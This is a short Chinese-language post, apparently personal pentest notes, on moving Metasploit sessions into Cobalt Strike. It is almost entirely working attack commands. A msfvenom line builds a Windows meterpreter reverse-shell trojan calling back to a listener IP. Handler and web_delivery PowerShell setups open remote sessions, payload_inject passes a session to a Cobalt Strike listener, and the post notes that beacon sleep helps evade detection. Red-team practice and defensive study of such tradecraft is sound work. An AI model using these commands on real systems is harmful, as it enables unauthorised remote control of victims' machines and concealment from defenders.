MSF上线CS
1.MSF运行exe上线
先用msfvenom生成一个木马,这里是windows的木马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.255.128 LPORT=6666 -f exe >/root/Payload/msf.exe
然后到主机中运行exe
msf监听得到session
use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set lhost 192.168.255.128 set lport 6666 exploit
2.powershell上线
使用powershell上线MSF
使用的不是msf中exploit/multi/handler模块,而是使用的exploit/multi/script/web_delivery类
use exploit/multi/script/web_delivery set target 2 注意这里是 target 2 set payload windows/x64/meterpreter/reverse_tcp set lhost 192.168.255.128 set lport 6666 run
然后复制生成的powershell到windows主机中执行powershell
成功上线
启动cs
MSF上使用payload_inject模块
use exploit/windows/local/payload_inject 使用该模块可以将 Metasploit 获取到的会话注入到CS中 set DisablePayloadHandler true 用来禁用 Metasploit payload handler的监听 因为要监听到cs上 set lhost xxx CSIP set lport 7869 CS上的listen端口 set session 10 要转发的session
成功上线cs
在interact交互的时候执行命令返回很慢,是因为cs自带有sleep机制 这样可以减少被检测出的风险
可以通过sleep 1 调整休眠时间
然后再执行命令响应就很快了